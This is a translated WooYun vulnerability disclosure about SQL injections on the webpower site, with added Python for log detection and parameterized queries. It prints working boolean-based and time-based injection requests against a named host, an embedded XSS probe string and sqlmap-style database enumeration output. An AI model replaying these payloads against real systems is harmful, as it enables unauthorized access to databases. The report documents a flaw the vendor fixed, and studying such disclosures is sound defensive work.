
Vulnerability summary (24 followers)

Vulnerability ID: wooyun-2016-0190112

Title: Multiple SQL injections found in webpower

Vendor: webpower

Author: 唐小风

Submitted: 2016-03-28 18:25

Fixed: 2016-03-29 10:27

Published: 2016-03-29 10:27

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: fixed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2016-03-28: Details sent to the vendor, awaiting vendor action
2016-03-29: Vendor confirmed; details disclosed to the vendor only
2016-03-29: Vendor fixed the vulnerability and disclosed it voluntarily; details made public

Brief description:

Found quite a few injection points!!! Come on... # how about an invite code!!

Details:

GET /case/case.php?id=-1%20OR%203*2*1%3d6%20AND%20000819%3d000819%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.webpowerchina.com:80/
Cookie: PHPSESSID=q1ci4g98545c35upkr3k1kct84; Hm_lvt_f9f5dc02f2641cc57849f0dd787c856b=1459158007,1459158153,1459158270,1459158424; Hm_lpvt_f9f5dc02f2641cc57849f0dd787c856b=1459158424; wt3_eid=%3B424535895385461%7C2145915760900367143%232145915842300558358; wt3_sid=%3B424535895385461; HMACCOUNT=CF1DF2E45C32ABDA; AWSELB=4743DD810E1C3A37CA32C8C951318F0E650B60F936947BED01B4EF28EEE21F669286F4C9CA79FCFCA481BAC8515D1A327D4FF020898E026D35B138F1F824E07C37377DD5F7; BAIDUID=2624913B13454C384CBD158CDE4BC7DE:FG=1; BAIDU_SSP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
Host: www.webpowerchina.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


111.png


222.png


GET /case/page.php?cases_type=1002&id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.webpowerchina.com:80/
Cookie: PHPSESSID=q1ci4g98545c35upkr3k1kct84; Hm_lvt_f9f5dc02f2641cc57849f0dd787c856b=1459158007,1459158153,1459158270,1459158424; Hm_lpvt_f9f5dc02f2641cc57849f0dd787c856b=1459158424; wt3_eid=%3B424535895385461%7C2145915760900367143%232145915842300558358; wt3_sid=%3B424535895385461; HMACCOUNT=CF1DF2E45C32ABDA; AWSELB=4743DD810E1C3A37CA32C8C951318F0E650B60F936947BED01B4EF28EEE21F669286F4C9CA79FCFCA481BAC8515D1A327D4FF020898E026D35B138F1F824E07C37377DD5F7; BAIDUID=2624913B13454C384CBD158CDE4BC7DE:FG=1; BAIDU_SSP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
Host: www.webpowerchina.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


333.png
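As an added illustration, not part of the original report, the following Python scans web access logs for the kind of parameter values shown in the requests above: a digits-only check on id parameters is the actual detection, and the technique tags only label what was attempted. The log lines are constructed (the two query strings are copied from the report's requests), and treating `id` and `cases_type` as integer ids is my assumption.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (not the site's real logs): the two query strings are copied from the
# requests quoted in the report, as sent, plus one benign request for contrast.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2016:18:13:19 +0800] "GET /case/case.php?id=-1%20OR%203*2*1%3d6%20AND%20000819%3d000819%20--%20 HTTP/1.1" 200 5120
203.0.113.5 - - [28/Mar/2016:18:13:20 +0800] "GET /case/page.php?cases_type=1002&id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1" 200 4880
203.0.113.5 - - [28/Mar/2016:18:14:01 +0800] "GET /case/case.php?id=42 HTTP/1.1" 200 5120
"""

# Assumption: these parameters are integer record ids in the affected scripts.
NUMERIC_PARAMS = {"id", "cases_type"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Techniques the report's requests exhibit, matched against the URL-decoded parameter value.
TECHNIQUE_RE = {
    "boolean-based": re.compile(r"\b(?:or|and)\b\s+[\w*]+\s*=\s*[\w*]+", re.I),
    "time-based": re.compile(r"\bsleep\s*\(|now\(\)\s*=\s*sysdate\(\)", re.I),
    "comment-terminated": re.compile(r"--\s|/\*"),
}

def classify(value):
    """Name each technique whose pattern appears in a decoded parameter value."""
    return [name for name, rx in TECHNIQUE_RE.items() if rx.search(value)]

def scan_log(text):
    """Flag requests whose integer-only parameters carry anything but digits."""
    # The digits-only check is the actual detection (re-encoding the SQL cannot evade it);
    # the technique tags only help an analyst label what was attempted.
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                findings.append({"path": url.path, "param": name,
                                 "value": value, "tags": classify(value)})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['path']} {f['param']}={f['value']!r} -> {', '.join(f['tags']) or 'unclassified'}")
```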

Proof of vulnerability:

[18:13:19] [INFO] testing MySQL
[18:13:20] [INFO] confirming MySQL
[18:13:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL >= 5.0.0
[18:13:20] [INFO] fetching database names
[18:13:20] [INFO] fetching tables for databases: 'wp-e-sight-en, wp-e-sight, wp_e-home, wp_tl-group, information_schema, k11_birthday, k11_optin, ktest, mysql, phpmyadmin, site_xbox, task, ued_wiki, webpower_website, wechat_site, wp_faq, wp_task, wp_webpowerasia, wp_website'

Remediation:

Filter the input.
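An added example, not code from the report or from webpower: the string-concatenation query pattern that the first request's behaviour implies, beside a hardened version that validates the type and binds the value as a parameter, both run against a constructed in-memory SQLite table with the report's boolean-based `id` value. The `cases` table, its columns and its rows are assumptions.

```python
import re
import sqlite3

# Boolean-based value from the report's first request, URL-decoded.
TAUTOLOGY = "-1 OR 3*2*1=6 AND 000819=000819 -- "

def make_db():
    """Constructed fixture standing in for the site's case records (names assumed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE cases (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    con.executemany("INSERT INTO cases VALUES (?, ?, ?)",
                    [(1, "public case A", 1), (2, "public case B", 1), (3, "unpublished draft", 0)])
    return con

def lookup_unsafe(con, raw_id):
    """The pattern the report's behaviour implies: the id is pasted straight into the SQL text."""
    sql = "SELECT title FROM cases WHERE id=" + raw_id   # vulnerable: attacker-controlled SQL
    return [row[0] for row in con.execute(sql)]

def lookup_safe(con, raw_id):
    """Hardened form: reject anything that is not an integer, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError("id must be an integer")
    rows = con.execute("SELECT title FROM cases WHERE id=?", (int(raw_id),))
    return [row[0] for row in rows]

def compare(raw_id):
    """Return (rows from the unsafe query, rows from the safe query or the message it rejects with)."""
    con = make_db()
    unsafe = lookup_unsafe(con, raw_id)
    try:
        safe = lookup_safe(con, raw_id)
    except ValueError as exc:
        safe = str(exc)
    return unsafe, safe

if __name__ == "__main__":
    print(compare("2"))         # both paths return ['public case B']
    print(compare(TAUTOLOGY))   # unsafe returns every row, the draft included; safe rejects the input
```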

Copyright notice: please credit 唐小风@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 5

Confirmed: 2016-03-29 10:26

Vendor reply:

Confirmed and fixed.

Latest status:

2016-03-29: fixed


Comments:

  1. 2016-03-29 19:56 | jglimmers ( Passer-by | Rank:4 Vulnerabilities:1 | Nothing beats a long-awaited reunion. )

    Looks like you're also one of the folks who got promoted to rolling.

  2. 2016-03-30 12:13 | 唐小风 ( Passer-by | Rank:2 Vulnerabilities:1 | Incorrigible flirt )

    @jglimmers hahaha